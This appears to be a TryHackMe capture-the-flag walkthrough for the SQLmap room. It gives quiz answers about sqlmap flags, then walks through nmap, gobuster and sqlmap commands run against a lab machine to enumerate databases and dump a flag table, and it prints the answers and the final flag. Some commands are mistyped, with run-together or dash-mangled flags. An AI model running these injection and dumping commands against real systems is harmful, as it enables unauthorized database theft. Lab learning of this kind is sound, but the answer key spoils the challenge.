TryHackMe-Walkthrough-SQLmap

SQLMAP : Learn about and use Sqlmap to exploit the web application

room link :

https://tryhackme.com/room/sqlmap

lets begin:

Task1 :Introduction

What is sqlmap?

sqlmap is an open source penetration testing tool developed by Bernardo Damele Assumpcao Guimaraes and Miroslav Stampar that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches lasting from database fingerprinting, fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Installing Sqlmap

If you’re using Kali Linux, sqlmap is pre-installed. Otherwise, you can download it here: https://github.com/sqlmapproject/sqlmap

Task 2 : Using SQLmap :

Which flag or option will allow you to add a URL to the command?

Answer : -u

Which flag would you use to add data to a POST request?

Answer : — data

There are two parameters: username and password. How would you tell sqlmap to use the username parameter for the attack?

Answer : -p username

Which flag would you use to show the advanced help menu?

Answer : -hh

Which flag allows you to retrieve everything?

Answer : -a

Which flag allows you to select the database name?

Answer : -D

Which flag would you use to retrieve database tables?

Answer : — tables

Which flag allows you to retrieve a table’s columns?

Answer : — columns

Which flag allows you to dump all the database table entries?

Answer : — dump-all

Which flag will give you an interactive SQL Shell prompt?

Answer : — sql-shell

You know the current db type is ‘MYSQL’. Which flag allows you to enumerate only MySQL databases?

Answer : — dbms=MYSQL

Task 3 SQLMap Challenge

What is the name of the interesting directory ?

let’s start enumurate the web server using Nmap

nmap ip_addr -vv

let’s check port 80

so let’s check other directory with gobuster or dirbuster

gobuster dir -u 'http://ip_addr/' -w /usr/share/wordlists/rockyou.txt

Answer : blood

Who is the current db user?

let check firstly the directory that we find it

let try to login , after let’s use burp suite to intercept the login page and save it in FILE.txt to use it with sqlmap

sqlmap -r file.txt --dbs

so we find many database so let’s check the current database

sqlmap -r file.txt --current-db

and here we go that’s it we find that the current databse named blood

Answer : blood.

Who is the current db user?

Answer : root

What is the final flag?

let’s use this query .

sqlmap -u "http://10.10.48.187/blood/view.php?id=1"  -D blood -T flag --column

now let’s try to get the flag

sqlmap -u "http://10.10.48.187/blood/view.php?id=1"  -D blood -T flag --columns--dbms=mysql

Answer : thm{sqlm@p_is_L0ve}

thank you for your feedback and your attention

#Cybersecurity #SQLInjection #WebAppSecurity #EthicalHacking #TryHackMe #MediumArticle #FeedbackWelcome